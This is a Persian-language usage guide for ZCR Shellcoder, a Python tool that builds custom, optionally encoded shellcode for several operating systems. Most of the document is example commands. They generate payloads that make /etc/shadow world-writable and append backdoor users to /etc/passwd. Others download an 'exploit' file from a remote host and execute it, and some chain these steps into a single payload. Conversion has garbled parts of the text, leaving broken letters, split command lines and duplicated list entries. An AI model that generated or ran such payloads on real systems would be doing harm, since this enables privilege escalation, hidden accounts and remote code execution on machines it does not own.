ZCR Shellcoder

نویسنده : علی رزمجو

ZeroDay Cyber Research Shellcoder (تولید کننده) یک نرم افزار متن باز به زبان پایتون میباشد که به شیا امکان ساخت شلکد سفارشی (custimzed) را برای سیستم عامل های لیست شده میدهد. این نرم افزار توانایی اجرا در 2.7.x را دارد.



براى نشان دادن ليست سويچ ها ، سويچ "h-" يا "help-" يا "help-" يا "help--" را اجراكنيد.

```
ZeroDay Cyber Research Shellcoder

Switches:
-h, --h, -help, --help => to see this help guide
-os => choose your os to create shellcode
-oslist => list os for switch -os
-o => output filename
-job => what shellcode gonna do for you?
-joblist => list of -job switch
-encode => generate shellcode with encode
-types => types of encode for -encode switch
-update => check for update

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/
AlieZ3r0D4y.Com
key: ASIIN_BLUE_RUBY | version: 1.0.0 | Release Date: 2015 May 22
```

سویج OS- به شا اجازه میدهد تا سیستم عامل تارگت (هدف) خود را انتخاب کنید. برای دیدن لیست سیستم عامل ها از سویج OSlist- استفاده کند.

```
[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x86
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x86
[+] solaris_x64

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/p/zcr-shellcoder.html
Ali@Z3r0D4y.Com
key: ASIIN_BLUE_RUBY | version: 1.0.0 | Release Date: 2015 May 22
```

سویچ 0- جممت انتخاب نام فایل خروجی شما را که در پوشه output تولید خواهد شد میباشد.

سوپچ **job- جم**ت انتخاب فانکشن (Function) برای تولید شلکد میباشد. شیا میتوانید با استفاده از سوپچ **joblist-** لیست فانکشن ها را مشاهده کنید.

```
[+] exec('/path/file')
[+] chmod('/path/file','permission number')
[+] write('/path/file','text to write')
[+] file_create('/path/file','text to write')
[+] dir_create('/path/folder')
[+] download('url','filename')
[+] download_execute('url','filename','command to execute')
[+] system('command to execute')
[+] script_executor('name of script','path and name of your script in your pc','execute command')

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/
Ali0Z3r0D4y.Com
key: ASIIN_BLUE_RUBY | version: 1.0.0 | Release Date: 2015 May 22
```

سویچ encode- جمت انتخاب نوع انکود(Encode) شلکد خروجی میباشد، برای مشاهده لیست انکود ها از سویچ types- استفاده کنید.

```
[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc_timesyouwant
[+] inc_timesyouwant
[+] dec
[+] dec
[+] dec
[+] dec_timesyouwant
[+] mix_all

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/p/zcr-shellcoder.html
Ali@Z3r0D4y.Com
key: ASIIN_BLUE_RUBY | version: 1.0.0 | Release Date: 2015 May 22
```

سویچ update- جمت آپدیت کردن نرم افزار استفاده میشود، همچنین شا میتوانید آرشیو فایل ها را در لینک زیر مشاهده کنید.

https://github.com/Ali-Razmjoo/ZCR-Shellcoder-Archive

و آخرین آپدیت در اینجا در دسترس میباشد : https://github.com/Ali-Razmjoo/ZCR-Shellcoder

http://www.z3r0d4y.com/p/zcr-shellcoder.html : •

ویژگی های موجود

نمونه دستورات اجرايي:

Windows cmd:

python shellcoder.py -os linux_x86 -job chmod('/etc/shadow','777') -encode none -o shellcode.asm

python shellcoder.py -os linux_x86 -job write('/etc/passwd','Ali......[add user]') -encode none -o shellcode.asm

python shellcoder.py -os linux_x86 -job exec('/usr/bin/python') -encode none -o shellcode.asm

system()

python shellcoder.py -os linux_x86 -job system('chmod[space]777[space]/etc/shadow') - encode none -o shellcode.asm

multi command execution

python shellcoder.py -os linux_x86 -job
system('chmod[space]777[space]/etc/shadow;wget[space]exploit[space];chmod[space]+x[s
pace]exploit[space];./exploit;echo[space]user:pass[space]>>[space]/etc/passwd') -encode
none -o shellcode.asm

python shellcoder.py -os linux_x86 -encode none -job file_create('/root/Desktop/hello.txt','hello') -o file.txt

python shellcoder.py -os linux_x86 -encode none -job file_create('/root/Desktop/hello2.txt','hello[space]world[space]!') -o file.txt

python shellcoder.py -os linux_x86 -encode none -job dir_create('/root/Desktop/mydirectory') -o file.txt

python shellcoder.py -os linux_x86 -encode none -job download('http://www.z3r0d4y.com/exploit.type','myfile.type') -o file.txt

python shellcoder.py -os linux_x86 -encode none -job download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','./myfile.type') -o file.txt

```
python shellcoder.py -os linux_x86 -encode none -job
download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','chmod[space]77
7[space]myfile.type;sh[space]myfile.type') -o file.txt
python shellcoder.py -os linux_x86 -encode none -job
script_executor('script.type','D:\\myfile.type','./script.type') -o file.txt
python shellcoder.py -os linux_x86 -encode none -job
script_executor('z3r0d4y.sh','/root/z3r0d4y.sh','sh[space]z3r0d4y.sh') -o file.txt
python shellcoder.py -os linux_x86 -encode none -job
script_executor('ali.py','/root/Desktop/Oday.py','chmod[space]+x[space]ali.py;[space]pyt
hon[space]ali.py') -o file.txt
python shellcoder.py -os linux_x86 -encode xor_random -job chmod('/etc/shadow','777')
-o file.txt
python shellcoder.py -os linux_x86 -encode xor_random -job chmod('/etc/passwd','444')
-o file.txt
python shellcoder.py -os linux_x86 -encode xor_0x41414141 -job
chmod('/etc/shadow','777') -o file.txt
python shellcoder.py -os linux_x86 -encode xor_0x45872f4d -job
chmod('/etc/passwd','444') -o file.txt
python shellcoder.py -os linux_x86 -encode add_random -job chmod('/etc/passwd','444')
-o file.txt
python shellcoder.py -os linux_x86 -encode add_0x41414141 -job
chmod('/etc/passwd','777') -o file.txt
python shellcoder.py -os linux_x86 -encode sub_random -job chmod('/etc/passwd','777')
-o file.txt
python shellcoder.py -os linux_x86 -encode sub_0x41414141 -job
chmod('/etc/passwd','444') -o file.txt
```

Linux and OSX Terminal:

you need to put a "\" behind the "(" and "'" char in your switch.

python shellcoder.py -os linux_x86 -job chmod\(\'/etc/shadow\', \'777\'\) -encode none -o shellcode.asm

python shellcoder.py -os linux_x86 -job write\(\'/etc/passwd\', \'Ali......[add user] \'\) - encode none -o shellcode.asm

python shellcoder.py -os linux_x86 -job exec\(\'/usr/bin/python\'\) -encode none -o shellcode.asm

system()

python shellcoder.py -os linux_x86 -job
system\(\'chmod[space]777[space]/etc/shadow\'\) -encode none -o shellcode.asm

multi command execution

python shellcoder.py -os linux_x86 -job
system\(\'chmod[space]777[space]/etc/shadow;wget[space]exploit[space];chmod[space]+
x[space]exploit[space];./exploit;echo[space]user:pass[space]>>[space]/etc/passwd\'\) encode none -o shellcode.asm

python shellcoder.py -os linux_x86 -encode none -job file_create\(\'/root/Desktop/hello.txt\',\'hello\'\) -o file.txt

python shellcoder.py -os linux_x86 -encode none -job file_create\(\'/root/Desktop/hello2.txt\',\'hello[space]world[space]!\'\) -o file.txt

python shellcoder.py -os linux_x86 -encode none -job dir_create\(\'/root/Desktop/mydirectory\'\) -o file.txt

python shellcoder.py -os linux_x86 -encode none -job download\(\'http://www.z3r0d4y.com/exploit.type\',\'myfile.type\'\) -o file.txt

python shellcoder.py -os linux_x86 -encode none -job download_execute\(\'\frac{http://www.z3r0d4y.com/exploit.type\',\'myfile.type\',\'./myfile.type\'\) -o file.txt

ZCR

```
python shellcoder.py -os linux_x86 -encode none -job
download_execute\(\'http://www.z3r0d4y.com/exploit.type\',\'myfile.type\',\'chmod[sp
ace]777[space]myfile.type;sh[space]myfile.type\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode none -job
script_executor\(\'script.type\',\'D:\\myfile.type\',\'./script.type\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode none -job
script_executor\(\'z3r0d4y.sh\',\'/root/z3r0d4y.sh\',\'sh[space]z3r0d4y.sh\'
file.txt
python shellcoder.py -os linux_x86 -encode none -job
script_executor\(\'ali.py\',\'/root/Desktop/Oday.py\',\'chmod[space]+x[space]ali.py;[spa
ce]python[space]ali.py\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode xor_random -job
chmod\(\'/etc/shadow\',\'777\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode xor_random -job
chmod\(\'/etc/passwd\',\'444\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode xor_0x41414141 -job
chmod\(\'/etc/shadow\',\'777\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode xor_0x45872f4d -job
chmod\(\'/etc/passwd\',\'444\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode add_random -job
chmod\(\'/etc/passwd\',\'444\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode add_0x41414141 -job
chmod\(\'/etc/passwd\',\'777\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode sub_random -job
chmod\(\'/etc/passwd\',\'777\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode sub_0x41414141 -job
chmod\(\'/etc/passwd\',\'444\'\) -o file.txt
```

برای اطالاعات بیشتر و آنالیز برنامه و راهنایی از وبسایت <u>z3r0d4y.com</u> بازدید فرمایید.

منابع:

ZeroDay Cyber Research z3r0d4y.com

 $Home: \underline{http://www.z3r0d4y.com/p/zcr-shellcoder.html}$

Analysis post: http://www.z3r0d4y.com/2015/05/zcr-shellcoder-review-and-

analysis_20.html

Github: https://github.com/Ali-Razmjoo/ZCR-Shellcoder

Archive: https://github.com/Ali-Razmjoo/ZCR-Shellcoder-Archive